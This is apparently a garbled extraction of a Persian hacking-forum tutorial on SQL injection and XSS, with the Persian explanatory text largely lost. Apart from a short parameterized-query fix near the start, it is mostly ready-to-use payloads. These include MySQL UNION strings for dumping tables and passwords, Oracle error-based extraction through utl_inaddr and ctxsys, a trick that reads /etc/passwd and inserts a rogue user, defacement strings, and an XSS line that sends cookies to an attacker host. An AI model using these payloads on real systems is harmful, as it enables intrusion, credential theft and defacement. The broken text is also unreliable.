Professional Documents
Culture Documents
yahoo2010 :
:
http://ashiyane.org/forums :
Y ! : ali_rezamilan
1390 / 06 / 06 :
1
sql injection - 2
xss 3
SQL Injection
.
!! .
SQL Application! :
Login:
Login ID Password SQL
. :
& SELECT+COUNT(UserID)+FROM+tblUsers+WHERE+UserID= & UserID.Text & AND Pass= & Password.Text
UserID Password TextBox .
mahdi SQL :
SELECT+COUNT(UserID)+FROM+tblUsers+WHERE+UserID=mahdi+AND+Pass=123
. :
OR 1=1
SQL :
SELECT+COUNT(UserID)+FROM+tblUsers+WHERE+UserID=OR
1=1
AND
=PASS
SQL
= OR UserID 1=1
Attacker Authenticate .
SQL
Server .
!
ASP.NET .
:
:
Dim strSQL As String = SELECT COUNT(UserID) FROM tblUsers WHERE
UserID=@UserID AND Password=@Password
)Dim cmndCheck As OleDbCommand = New OleDbCommand(strSQL, _Connection
;)cmndCheck.Parameters.Add(@UserID, UserID.Text
;)cmndCheck.Parameters.Add(@Password, Password.Text
)(cmndCheck.Connection.Open
)(Dim IsValid As Integer = cmndCheck.ExecuteScalar
If IsValid > 0
Some Code here User is authenticated
Else
Some Code here User is not aututorized to view the page
End If
SQL Injection .
& + .
Application .
Application Customize
.
SQL Injection:
XSS
=http://www.folan.com/login.php?bahman
>http://www.folan.com/login?bahman=<h1>salam</h1
html
.
cookie
http://foloan/bahman.php/n=<script>document.location.replace('http://nofozgar
>/begir?borohalakon=document.cookie)</script
);
-999/**/order/**/by/**/cloumn/*
------------------------------999/**/and/**/1=0/**/union/**/all/**/select/**/cloumn/*
------------------------------999+order+by+cloumn-------------------------------999+and+1=0+union+all+select+cloumn-------------------------------999+and+1=0+union+all+select+cloumn+from+user------------------------------Note : version 4 bayad name table ha ro hads zad : from+user or users or ...
------------------------------999+and+1=0+union+all+select+cloumn(1,2,user,password)+from+users------------------------------999/**/and/**/1=0/**/Union/**/all/**/Select+column/**/from+iNformatTion_Schem
a------------------------------For get tables :
999+and+1=0+Union+all+Select+column+(table_name)+from+iNformatTion_Schema.tab
les------------------------------For get tables with bypass :
999/**/and/**/1=0/**/Union/**/all+Select/**/column+(table_name)+from+iNformat
Tion_Schema.tables------------------------------For get tables with group_concat :
999+and+1=0+Union+all+Select+column+group_concat(table_name)+from+iNformatTio
n_Schema.tables--
999+Union+Select+all+1,2,unhex(hex(group_concat(column_name))),4,5,6,7,8+from+iNformation_sche
ma.columns-999+Union+Select+all+1,2,unhex(hex(group_concat(table_name))),4,5,6,7,8+from+iNformation_schema
.tables-------------------------------
SQL ASP
'having 1=1--
b2b_supplier_id
b2b_supplier_loginname
-----------------------------'group by b2b_supplier_id having 1=1-- ( dobare dakhele login or username
bad login konid ta table badi bedast biad )
------------------------------
Basics ( )
Variations ( )
Operators :
SELECT 1 && 1;
SELECT 1 || 1;
SELECT 1 XOR 0;
Evaluate :
all render TRUE or 1.
SELECT 0.1 <= 2;
SELECT 2 >= 2;
SELECT ISNULL(1/0);
Math :
SELECT FLOOR(7 + (RAND() * 5));
SELECT ROUND(23.298, -1);
Misc :
SELECT LENGTH(COMPRESS(REPEAT('a',1000)));
SELECT MD5('abc');
Benchmark :
SELECT BENCHMARK(10000000,ENCODE('abc','123'));
Gathering info ( )
Table mapping :
SELECT COUNT(*) FROM tablename
Field mapping :
SELECT
SELECT
SELECT
SELECT
*
*
*
*
FROM
FROM
FROM
FROM
tablename
tablename
tablename
tablename
WHERE
WHERE
WHERE
WHERE
user
user
user
user
LIKE "%root%"
LIKE "%"
= 'root' AND id IS NOT NULL;
= 'x' AND id IS NULL;
User mapping :
SELECT * FROM tablename WHERE email = 'user@site.com';
SELECT * FROM tablename WHERE user LIKE "%root%"
SELECT * FROM tablename WHERE user = 'username'
Extracting hashes :
SELECT user FROM login WHERE user = 'root'
UNION SELECT IF(SUBSTRING(pass,1,1) = CHAR(97),
BENCHMARK(1000000,MD5('x')),null) FROM login
Example :
SELECT user FROM login WHERE user = 'admin'
UNION SELECT IF(SUBSTRING(passwordfield,1,1) = CHAR(97),
BENCHMARK(1000000,MD5('x')),null) FROM login
A quoteless example :
SELECT user FROM login WHERE user =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39))
UNION SELECT IF(SUBSTRING(pass,1,2) = CHAR(97,97),
BENCHMARK(1000000,MD5(CHAR(59))),null) FROM login
Misc : ( )
Retrieve /etc/passwd file, put it into a field and insert a new user :
load data infile "/etc/passwd" INTO table login (profiletext, @var1) SET user
=
'r00t', pass = 'abc'
Then login !
Write the DB user away into tmp :
SELECT host,user,password FROM user into outfile '/tmp/passwd';
Bypass :
SELECT * FROM login WHERE user = 0x726F6F74
gives you :
726F6F74
then add :
0x
: USER USERNAME
WWW.SITE.COM/INDEX.PHP?ID=42 update+user+set+username=alireza-( ) : password
e10adc3949ba59abbe56e057f20f883e : 123456
: 1
' or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))--
( ) Common Problems
: 2
:
Display the database version information in an error message (injected into an
integer)
[low privilege]
: 3
or 1=utl_inaddr.get_host_address((select sys.stragg (distinct username||chr(32)) from
all_users))--
if stragg, it is possible to do the same using XMLDB stragg is limited to 4096
bytes
: 4
Get the privileges of this account. Iterate via r=1, r=2, r=3, ...
[low privilege]
No
: 5
or 1=utl_inaddr.get_host_address((SELECT sys_context('USERENV', 'ISDBA')
FROM dual)) or 1=utl_inaddr.get_host_address((SELECT sys_context((select
chr(85)||chr(83)||chr(69)||chr(82)||chr(69)||chr(78)||chr(86) from dual), (select
chr(73)||chr(83)||chr(68)||chr(66)||chr(65) from dual)) FROM dual))
If the usage of single quotes returns an ORA-0911 (invalid character) you should
use the second string
: 6
or 1=utl_inaddr.get_host_address((select sys.stragg (distinct
table_name||chr(58)||column_name||chr(58)||data_type||chr(58)||column_id||chr(59))
from user_tab_columns order by table_name,column_id))-:
Get a list of all user tables including the column name and type
[low privilege]
:
No
:
No
String Concatenation
Description
'a' || 'b'
concat('a','b')
TBD
String Concatenation
1 or 1 = ordsys.ord_dicom.getmappingxpath((select
banner from v$version where
rownum=1),user,user)--
1 or 1= CTXSYS.DRITHSX.SN(user,(select banner
from v$version where rownum=1))--
Message
valid .
scott
:
http://www.google.com/search?q=ora-01756
:
http://www.techonthenet.com/oracle/errors/ora01756.php
:
sql injection .
string
or 1=1--
UNION SELECT
.
1
:
or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))--
. ORA-01756 .
50 . 50 .
firefox
:
https://addons.mozilla.org/de/firefox/addon/web-developer
or
https://addons.mozilla.org/de/firefox/addon/60
: ORA-01756
ORA-24247 Netzwerkzugriff von Access Control List (ACL) abgelehnt.
:
)ORA-24247 network access denied by access control list (ACL
.
DNS utl_inaddr
http://psoug.org/reference/utl_inaddr.html
:
ult_inaddr :
ctxsys.drithsx.sn
:
or 1=ctxsys.drithsx.sn(1,(select banner from v$version where rownum=1))--
1 1 . 1
| | (col1 | | col2).
pentesters rownum .
11g stragg :
.
stragg :
or 1=ctxsys.drithsx.sn(1,(select sys.stragg(distinct banner)|| from v$version))--
:
);]|| or 1=ctxsys.drithsx.sn(1,(select sys.stragg(distinct owner||.'||table_name||['||data_type
from all_tab_columns where column_name=PASSWORD))--
SHOP.SHOWUSER .
.
:
or 1=ctxsys.drithsx.sn(1,(select sys.stragg(distinct password||;') from
shop.shopuser))--
UNION SELECT
.
or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))- or 1=utl_inaddr.get_host_address((select sys.stragg(distinct granted_role||;') from
user_role_privs))- or 1=utl_inaddr.get_host_address((select sys.stragg(distinct
owner||.'||table_name||['||data_type||];) from all_tab_columns where
column_name=PASSWORD))- or 1=utl_inaddr.get_host_address((select sys.stragg(distinct password||;') from
shop.shopuser))--
Strings SQL :
'
/
*
xss
<SCRIPT>alert(XSS);</SCRIPT>
<script><img=http://up6.iranblog.com/uploads/13140259851.jpg>hack by
yahoo2010</img></script>
<script>alert("String.fromCharCode(104, 97, 99, 107, 32, 98, 121, 32, 121, 97,
<104, 111, 111, 50, 48, 49, 48)")</script>
><h1><img=http://up6.iranblog.com/uploads/13140259851.jpg>hack by
yahoo2010</img></h1>
"><iframe src=http://www.google.de>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83
))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,8
3,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SC
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG
SRC=javascript:al
ert('XSS')>
<IMG
SRC=javascri&
#0000112t:alert�
040'XSS')>
<IMG
SRC=javascript:ale&#x
72t('XSS')>
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT>alert(/XSS/.source)</SCRIPT>
\";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<IMG LOWSRC="javascript:alert('XSS')">
<IMG SRC='vbscript:msgbox("XSS")'>
<DIV STYLE="backgroundimage:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074
\003a\0061\006c\0065\0072\0074\0028\0027\0058\0053\0053\0027\0029'\0029">
><script >alert(document.cookie)</script>
%253cscript%253ealert(document.cookie)%253c/script%253e